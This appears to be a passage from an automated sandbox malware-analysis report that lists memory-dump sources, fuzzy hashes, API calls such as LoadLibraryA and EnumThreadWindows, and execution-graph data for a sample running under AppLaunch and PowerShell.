                                                          • Opcode Fuzzy Hash: 15bb1ea1d98950c654af34d6a86c3d1c3625de2546d57398b196b141e08760a8
                                                          • Instruction Fuzzy Hash: B6D05E20B1C40A07E668BF2880A63BDA0875FC4380F24C03FD01FC32E6CD6868020252
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 78a50c879e68f0753ec09682d1da8ef6077084e6e6d8a964d4130911a3afcccc
                                                          • Instruction ID: 8d5d4511cad1d2282b55191e7ff4a1b4cd9870f4508f3f6d2e4533f4f603e54f
                                                          • Opcode Fuzzy Hash: 78a50c879e68f0753ec09682d1da8ef6077084e6e6d8a964d4130911a3afcccc
                                                          • Instruction Fuzzy Hash: 6FD0A73185C2024BD31CB6344512131311A5F49320B60A47DD147422E3DCB9F1424142
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5d85bfe9b637445126a4191a8297a2914880b13deb8ec0edd293068e368e1641
                                                          • Instruction ID: 3ad12c01aea58a03afa09ff31c9e2ffc05b97f054f537d5c0d6bf90cc5b5447e
                                                          • Opcode Fuzzy Hash: 5d85bfe9b637445126a4191a8297a2914880b13deb8ec0edd293068e368e1641
                                                          • Instruction Fuzzy Hash: 2AD0A93213C28293D308FA1488425BA3354FB60349F20242EA24BCA6A2D914A1428A07
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 268209eec25a4de14f852accf70ed16cae5b2aed0ad14c7150173627456d02ed
                                                          • Instruction ID: 750769c39ad45a35c7a07a8433a745b04a28c5567486d7038c4a90b01bce1594
                                                          • Opcode Fuzzy Hash: 268209eec25a4de14f852accf70ed16cae5b2aed0ad14c7150173627456d02ed
                                                          • Instruction Fuzzy Hash: DEC0123650860647E218D9294441120715AAB81210761513CD267C62E1E939F5569541
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 66f605357df00c6cc59abef83241bd908f82324c90709ffa4c5a6b7f912dba59
                                                          • Instruction ID: f9362f9e6af877c3b09322b8eb1bd1541238d2c434a52fff2ead3922ae09c321
                                                          • Opcode Fuzzy Hash: 66f605357df00c6cc59abef83241bd908f82324c90709ffa4c5a6b7f912dba59
                                                          • Instruction Fuzzy Hash: F2C0127054810299931C562C0D066247255DBC57203258175FB6FE63F28EB5F68284C5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8e2eb639f27398eae11f47f4ff668cffd05dc3263abd52e84ef5ab5a98e33a58
                                                          • Instruction ID: e174968d0f743fda1b8f37d1ebb44d0d10b7e25a8333ab52cbdbda5540a94f07
                                                          • Opcode Fuzzy Hash: 8e2eb639f27398eae11f47f4ff668cffd05dc3263abd52e84ef5ab5a98e33a58
                                                          • Instruction Fuzzy Hash: 5FC0923134081D8FC680EB4CF884984B7E4FB4D22238211A2E40DCB226C365DCD2CB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c02030f6bd6f338ac2990361d7b49e1e2c9c63f1bb1da88b931599e909c017c1
                                                          • Instruction ID: b610cc6a00889aab7089a77309cdf9d22388d0e41217a4352840c9731c3e3f4e
                                                          • Opcode Fuzzy Hash: c02030f6bd6f338ac2990361d7b49e1e2c9c63f1bb1da88b931599e909c017c1
                                                          • Instruction Fuzzy Hash: 04C08C35E0C4258B832C9824402222A10498B45314F2050BECA0BA73F7DCA4AE4287C5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1a211a4f9d2f88a2fa258b08fae0cda2149266a50b37db258e787d8e79be81e5
                                                          • Instruction ID: 1fbce2d32484808baa4df0b4837afd7fc9ea6edea1002d137b6be901abbfeead
                                                          • Opcode Fuzzy Hash: 1a211a4f9d2f88a2fa258b08fae0cda2149266a50b37db258e787d8e79be81e5
                                                          • Instruction Fuzzy Hash: D0C09BD7D1D40707D3D0D65D544377045C6F7E47547555170A25DD73E6FC58AD4601C0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5fd39ff79cdc256b1dc982e5da9a5bd1f973d88dfed49709d0284e42a0839b0a
                                                          • Instruction ID: c637154c4fc1599fd4219f0f4d8d04063ef6a46e8e01289536cf4aa38c95ed74
                                                          • Opcode Fuzzy Hash: 5fd39ff79cdc256b1dc982e5da9a5bd1f973d88dfed49709d0284e42a0839b0a
                                                          • Instruction Fuzzy Hash: 03C04C747087058BE3599A1D44405757295EF86715720063CE2AAC27E1DD6AF9869604
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Execution Graph

                                                          Execution Coverage:14.2%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:74
                                                          Total number of Limit Nodes:3
execution_graph 18419 9827fe0 18420 9828025 MessageBoxW 18419->18420 18422 982806c 18420->18422 18459 9820910 18460 9820919 18459->18460 18461 98209a1 18460->18461 18465 9821019 18460->18465 18470 9821028 18460->18470 18475 98210a4 18460->18475 18466 9820ffe 18465->18466 18466->18465 18481 9824ef0 18466->18481 18486 9824f14 18466->18486 18467 9821098 18467->18461 18471 9821037 18470->18471 18473 9824ef0 OleInitialize 18471->18473 18474 9824f14 OleInitialize 18471->18474 18472 9821098 18472->18461 18473->18472 18474->18472 18476 98210b2 18475->18476 18477 9821062 18475->18477 18479 9824ef0 OleInitialize 18477->18479 18480 9824f14 OleInitialize 18477->18480 18478 9821098 18478->18461 18479->18478 18480->18478 18482 9824ef5 18481->18482 18483 982513f 18482->18483 18491 9825c60 18482->18491 18495 9825c70 18482->18495 18483->18467 18487 9824f52 18486->18487 18488 982513f 18487->18488 18489 9825c60 OleInitialize 18487->18489 18490 9825c70 OleInitialize 18487->18490 18488->18467 18489->18488 18490->18488 18492 9825c79 18491->18492 18499 982571c 18492->18499 18496 9825c79 18495->18496 18497 982571c OleInitialize 18496->18497 18498 9825c84 18497->18498 18498->18483 18500 9825727 18499->18500 18501 9826952 18500->18501 18503 98266ec 18500->18503 18505 98266f7 18503->18505 18504 9826a31 18504->18501 18505->18504 18508 98267c4 18505->18508 18507 9826a54 18509 98267cf 18508->18509 18510 9826d6b 18509->18510 18512 98267e0 18509->18512 18510->18507 18513 9826da0 OleInitialize 18512->18513 18514 9826e04 18513->18514 18514->18510 18515 9825f70 DuplicateHandle 18516 9826006 18515->18516 18423 69c7d70 18424 69c7d8e 18423->18424 18427 69c615c 18424->18427 18426 69c7dc5 18429 69c9890 LoadLibraryA 18427->18429 18430 69c9989 18429->18430 18431 982698f 18434 98266fc 18431->18434 18435 9826707 18434->18435 18440 9827b60 18435->18440 18444 9827c49 18435->18444 18451 9827b58 18435->18451 18436 982699c 18441 9827baf 18440->18441 18455 982684c 18441->18455 18445 9827c11 18444->18445 18446 9827c4f EnumThreadWindows 18444->18446 18447 9827c30 18445->18447 18448 982684c EnumThreadWindows 18445->18448 18450 9827cd0 18446->18450 18447->18436 18448->18447 18450->18436 18452 9827baf 18451->18452 18453 982684c EnumThreadWindows 18452->18453 18454 9827c30 18453->18454 18454->18436 18456 9827c50 EnumThreadWindows 18455->18456 18458 9827c30 18456->18458 18458->18436

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1675 69c615c-69c98e7 1677 69c98e9-69c990e 1675->1677 1678 69c993b-69c9987 LoadLibraryA 1675->1678 1677->1678 1681 69c9910-69c9912 1677->1681 1682 69c9989-69c998f 1678->1682 1683 69c9990-69c99c1 1678->1683 1684 69c9914-69c991e 1681->1684 1685 69c9935-69c9938 1681->1685 1682->1683 1687 69c99d1 1683->1687 1688 69c99c3-69c99c7 1683->1688 1689 69c9920 1684->1689 1690 69c9922-69c9931 1684->1690 1685->1678 1694 69c99d2 1687->1694 1688->1687 1692 69c99c9 1688->1692 1689->1690 1690->1690 1693 69c9933 1690->1693 1692->1687 1693->1685 1694->1694
                                                          APIs
                                                          • LoadLibraryA.KERNELBASE(?), ref: 069C9977
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.707697411.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_69c0000_AppLaunch.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: 12b6be1bd0d3eb86b84771369368d088b2520acce0dba5b109821170d6800f34
                                                          • Instruction ID: a8ed21fdb407f026d938493f5303e2aa6a250cfc0a58c0fff36e596715320714
                                                          • Opcode Fuzzy Hash: 12b6be1bd0d3eb86b84771369368d088b2520acce0dba5b109821170d6800f34
                                                          • Instruction Fuzzy Hash: 2E4168B1D006588FDB64CFA9C88479EBBF5FB48314F10842DE819A7780D7749845CF92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1695 69c9884-69c98e7 1697 69c98e9-69c990e 1695->1697 1698 69c993b-69c9987 LoadLibraryA 1695->1698 1697->1698 1701 69c9910-69c9912 1697->1701 1702 69c9989-69c998f 1698->1702 1703 69c9990-69c99c1 1698->1703 1704 69c9914-69c991e 1701->1704 1705 69c9935-69c9938 1701->1705 1702->1703 1707 69c99d1 1703->1707 1708 69c99c3-69c99c7 1703->1708 1709 69c9920 1704->1709 1710 69c9922-69c9931 1704->1710 1705->1698 1714 69c99d2 1707->1714 1708->1707 1712 69c99c9 1708->1712 1709->1710 1710->1710 1713 69c9933 1710->1713 1712->1707 1713->1705 1714->1714
                                                          APIs
                                                          • LoadLibraryA.KERNELBASE(?), ref: 069C9977
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.707697411.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_69c0000_AppLaunch.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: 2f5d534c5cc7f6247daacbf6a3b5c6f940be9a8a52f5747a04975d289184b30c
                                                          • Instruction ID: 4bb65ec7092c94ece1ee05706caa5630db6138eab66ce56608d5a7c69effe9ce
                                                          • Opcode Fuzzy Hash: 2f5d534c5cc7f6247daacbf6a3b5c6f940be9a8a52f5747a04975d289184b30c
                                                          • Instruction Fuzzy Hash: 5D4177B1D006498FDB54CFA9C88479EBBF5FB48314F108029D819E7780D7789842CF82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1715 9826868-9826871 1717 9826873-982687f 1715->1717 1718 9826835 1715->1718 1723 9827c50-9827c92 1717->1723 1719 9826837-9826853 1718->1719 1720 98267f9-98267fa 1718->1720 1719->1723 1724 9827c94 1723->1724 1725 9827c9e-9827cce EnumThreadWindows 1723->1725 1728 9827c9c 1724->1728 1726 9827cd0-9827cd6 1725->1726 1727 9827cd7-9827d04 1725->1727 1726->1727 1728->1725
                                                          APIs
                                                          • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E28,?,?,09827C30,07B96D30,06C24D5C), ref: 09827CC1
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.709182296.0000000009820000.00000040.00000800.00020000.00000000.sdmp, Offset: 09820000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9820000_AppLaunch.jbxd
                                                          Similarity
                                                          • API ID: EnumThreadWindows
                                                          • String ID:
                                                          • API String ID: 2941952884-0
                                                          • Opcode ID: eadc864623c8bcee450989e1458b77e2f4c61c657552b7627ef8cc5fd88739dc
                                                          • Instruction ID: 5f2b5976cfdd15dfdc3e0971c9066838b59d505703e66b39b9cef12314bfe753
                                                          • Opcode Fuzzy Hash: eadc864623c8bcee450989e1458b77e2f4c61c657552b7627ef8cc5fd88739dc
                                                          • Instruction Fuzzy Hash: 813198719002198FCB10CFAAC884BEEBBF9FB98354F04842ED415E7351D774A984CB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1731 9827c49-9827c4d 1732 9827c11-9827c29 1731->1732 1733 9827c4f-9827c92 1731->1733 1734 9827c30-9827c3d 1732->1734 1735 9827c2b call 982684c 1732->1735 1736 9827c94 1733->1736 1737 9827c9e-9827cce EnumThreadWindows 1733->1737 1735->1734 1740 9827c9c 1736->1740 1738 9827cd0-9827cd6 1737->1738 1739 9827cd7-9827d04 1737->1739 1738->1739 1740->1737
                                                          APIs
                                                          • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E28,?,?,09827C30,07B96D30,06C24D5C), ref: 09827CC1
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.709182296.0000000009820000.00000040.00000800.00020000.00000000.sdmp, Offset: 09820000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9820000_AppLaunch.jbxd
                                                          Similarity
                                                          • API ID: EnumThreadWindows
                                                          • String ID:
                                                          • API String ID: 2941952884-0
                                                          • Opcode ID: 788fdadb5a8540a80ff9a91dce4ecb9cd16a35dee8a69dc981a01e737c51d62d
                                                          • Instruction ID: 4b89d334579879fdf598331c999dea2eb09ae34f62e83abc48a72926c114b7b7
                                                          • Opcode Fuzzy Hash: 788fdadb5a8540a80ff9a91dce4ecb9cd16a35dee8a69dc981a01e737c51d62d
                                                          • Instruction Fuzzy Hash: C5313471900219CFDB10CFA9D844AEEFBF5EB88324F14842AD529E7350D374A945CF61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1743 9827fd9-9827fdd 1744 9827fa1-9827fa3 1743->1744 1745 9827fdf-9828023 1743->1745 1746 9827fa5-9827faf 1744->1746 1747 9827fcb-9827fcf 1744->1747 1748 9828025-9828028 1745->1748 1749 982802b-982802f 1745->1749 1746->1747 1755 9827fb1-9827fca 1746->1755 1748->1749 1750 9828031-9828034 1749->1750 1751 9828037-982806a MessageBoxW 1749->1751 1750->1751 1753 9828073-9828087 1751->1753 1754 982806c-9828072 1751->1754 1754->1753
                                                          APIs
                                                          • MessageBoxW.USER32(?,00000000,00000000,?), ref: 0982805D
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.709182296.0000000009820000.00000040.00000800.00020000.00000000.sdmp, Offset: 09820000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9820000_AppLaunch.jbxd
                                                          Similarity
                                                          • API ID: Message
                                                          • String ID:
                                                          • API String ID: 2030045667-0
                                                          • Opcode ID: e15ff8c34b41788ceb73778b42dc9c10521c69c52b2965fbee1d1ebd284f0705
                                                          • Instruction ID: a172d2013acea83533a4be97a98a94d0ef8810223b1319adb92fcb5401366465
                                                          • Opcode Fuzzy Hash: e15ff8c34b41788ceb73778b42dc9c10521c69c52b2965fbee1d1ebd284f0705
                                                          • Instruction Fuzzy Hash: 723147B69002198FCB14CFA9D484ADEBBF5FF58314F10846EE919E7710C335A985CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1759 982683f-9827c92 1761 9827c94 1759->1761 1762 9827c9e-9827cce EnumThreadWindows 1759->1762 1765 9827c9c 1761->1765 1763 9827cd0-9827cd6 1762->1763 1764 9827cd7-9827d04 1762->1764 1763->1764 1765->1762
                                                          APIs
                                                          • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E28,?,?,09827C30,07B96D30,06C24D5C), ref: 09827CC1
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.709182296.0000000009820000.00000040.00000800.00020000.00000000.sdmp, Offset: 09820000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9820000_AppLaunch.jbxd
                                                          Similarity
                                                          • API ID: EnumThreadWindows
                                                          • String ID:
                                                          • API String ID: 2941952884-0
                                                          • Opcode ID: 524b8d88308e3c6cc24683e9a81e6c89486956d3fb3078c91e420d603e9ba96b
                                                          • Instruction ID: 5a216e955f67e3a3bd41033d755698ae33aac73d4ae989ef11a9b539581e9c42
                                                          • Opcode Fuzzy Hash: 524b8d88308e3c6cc24683e9a81e6c89486956d3fb3078c91e420d603e9ba96b
                                                          • Instruction Fuzzy Hash: BF2136B19002198FCB14CFAAC884BEEBBF9FB98314F14842ED954A7351D774A945CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1768 9825f6c 1769 9825f70-9826004 DuplicateHandle 1768->1769 1770 9826006-982600c 1769->1770 1771 982600d-982602a 1769->1771 1770->1771
                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 09825FF7
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.709182296.0000000009820000.00000040.00000800.00020000.00000000.sdmp, Offset: 09820000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9820000_AppLaunch.jbxd
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          • Opcode ID: ca9d60135e844c636cacce3ac9a858dc050ff0c9973b075936c16ffc813f9774
                                                          • Instruction ID: ebc8db18ff97af5f68821006be79bc2da5f54e8d01a3d2684bf24bbc182c8d1b
                                                          • Opcode Fuzzy Hash: ca9d60135e844c636cacce3ac9a858dc050ff0c9973b075936c16ffc813f9774
                                                          • Instruction Fuzzy Hash: E721E6B5D002499FDB10CF99D584ADEBBF8FB48314F14841AE914B3350D374A944CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1887 982684c-9827c92 1889 9827c94 1887->1889 1890 9827c9e-9827cce EnumThreadWindows 1887->1890 1893 9827c9c 1889->1893 1891 9827cd0-9827cd6 1890->1891 1892 9827cd7-9827d04 1890->1892 1891->1892 1893->1890
                                                          APIs
                                                          • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E28,?,?,09827C30,07B96D30,06C24D5C), ref: 09827CC1
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.709182296.0000000009820000.00000040.00000800.00020000.00000000.sdmp, Offset: 09820000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9820000_AppLaunch.jbxd
                                                          Similarity
                                                          • API ID: EnumThreadWindows
                                                          • String ID:
                                                          • API String ID: 2941952884-0
                                                          • Opcode ID: 6f14321ce14fac3fbf0fc6dcef684584cee922f94d3f47a10c32641b55529bf0
                                                          • Instruction ID: a938045642ea01bd4c60bf5fde0273aa0ecd467392502d256cd8663c605e316a
                                                          • Opcode Fuzzy Hash: 6f14321ce14fac3fbf0fc6dcef684584cee922f94d3f47a10c32641b55529bf0
                                                          • Instruction Fuzzy Hash: BF2137719002198FDB10CFAAC844BEEFBF5EB98324F148429E564A3340D774A944CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1882 9825f70-9826004 DuplicateHandle 1883 9826006-982600c 1882->1883 1884 982600d-982602a 1882->1884 1883->1884
                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 09825FF7
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.709182296.0000000009820000.00000040.00000800.00020000.00000000.sdmp, Offset: 09820000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9820000_AppLaunch.jbxd
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          • Opcode ID: 6ae552f9eb455325a412a524b172166c58f7b982c85d1a8ae8ed10e5312cf0ee
                                                          • Instruction ID: 44d4cd073b661e1af3f3e26933e5486e06f6ddf4bc8c722d8a761d4d42749d4f

                                                          APIs
                                                          • MessageBoxW.USER32(?,00000000,00000000,?), ref: 0982805D
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.709182296.0000000009820000.00000040.00000800.00020000.00000000.sdmp, Offset: 09820000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9820000_AppLaunch.jbxd
                                                          Similarity
                                                          • API ID: Message
                                                          • String ID:
                                                          • API String ID: 2030045667-0
                                                          • Opcode ID: 1e7a2d694450cda04a17ec2981eb30bdc6e3c5d56cb5e5c758f4adb2fc2c3f59
                                                          • Instruction ID: 5565485350bba9794521e3ebe1d79f322ca91e8c4651d78eb7fbacde865f77ba

                                                          APIs
                                                          • OleInitialize.OLE32(00000000), ref: 09826DF5
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.709182296.0000000009820000.00000040.00000800.00020000.00000000.sdmp, Offset: 09820000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9820000_AppLaunch.jbxd
                                                          Similarity
                                                          • API ID: Initialize
                                                          • String ID:
                                                          • API String ID: 2538663250-0
                                                          • Opcode ID: 8a181e7c1927b9c6c4f1a1004b1448363f0eaafa52789fb592b47134e750d0aa
                                                          • Instruction ID: 037d55ba335eb66fa6e377549b06448ef6f639f55f5e8a16db0ec9dab31fafb6

                                                          APIs
                                                          • OleInitialize.OLE32(00000000), ref: 09826DF5
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.709182296.0000000009820000.00000040.00000800.00020000.00000000.sdmp, Offset: 09820000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9820000_AppLaunch.jbxd
                                                          Similarity
                                                          • API ID: Initialize
                                                          • String ID:
                                                          • API String ID: 2538663250-0
                                                          • Opcode ID: 8c26e4637d842f87a5f7e4502db062b536283543b446c17cbe22049ab184a946
                                                          • Instruction ID: 3bb0ea3f06dfd73ab4a244602506921fed967c9d50510c1ce326e6a21dbaebfc

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.515901735.00007FF9F0A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F0A80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_7ff9f0a80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @<1H$@lE$Q_L
                                                          • API String ID: 0-804404153
                                                          • Opcode ID: 0b12b55ed1496312f9272ad0065bcd6bc16ba7642b4f5fe828336245e94d1798
                                                          • Instruction ID: 27edcf7c0fb4af0bbcc53b011b10f61a60867f60f8dd0491427190e95fdce693

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.515661429.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_7ff9f09b0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: XOL
                                                          • API String ID: 0-2667528538
                                                          • Opcode ID: 2157784109bbb3ec7380b5a32bdb02548ed846dbece4c02761f38d373311a0f6
                                                          • Instruction ID: 33f5e3de06bde8136174674637e514fd1025c6be3dabdc94a6e1535896d775c8

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.515661429.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_7ff9f09b0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fec9b70c77f876896c1d82ef4d1ef4d018360611fbcf1df4721d3b475b38cd84
                                                          • Instruction ID: 14ea953f9f14a701b07e1349d167b20ed951ec8943248079d900cf4671bf7d09

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.515661429.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_7ff9f09b0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c3285b4d1236062eb59b38db5d958d70925f450312630fe265351ab6384e6f35
                                                          • Instruction ID: d5ca5a84db00440c9ba9fa4b52b6638e3593b0eb9a858acf310162a144a82f1b

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.515901735.00007FF9F0A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F0A80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_7ff9f0a80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a7381c27d86fba688fa02296e44358088f328cbd69267cefa57dda1474bcd96d
                                                          • Instruction ID: f4a00c64ca2bf085fbdc31cb7817236169bb656ffff5207b85d363afe9f47330

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.515661429.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_7ff9f09b0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2aaa151687488b3c147001fe871f43b9344f040292836954a320a3b3c45e0d30
                                                          • Instruction ID: 4e9f531ad8362a1ad71b59de7b98bddb659d92a4e10944eee1afd31ea65b630f

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.515661429.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_7ff9f09b0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d237825c80514f133e0ab615dc4ace01c6b96b306ccb80211495249ac91134e3
                                                          • Instruction ID: ccfc6d1db23a2a922fa08ad98f6cb418f8ac8c691c5f10012c6c941c08c9ce2f

                                                          Memory Dump Source
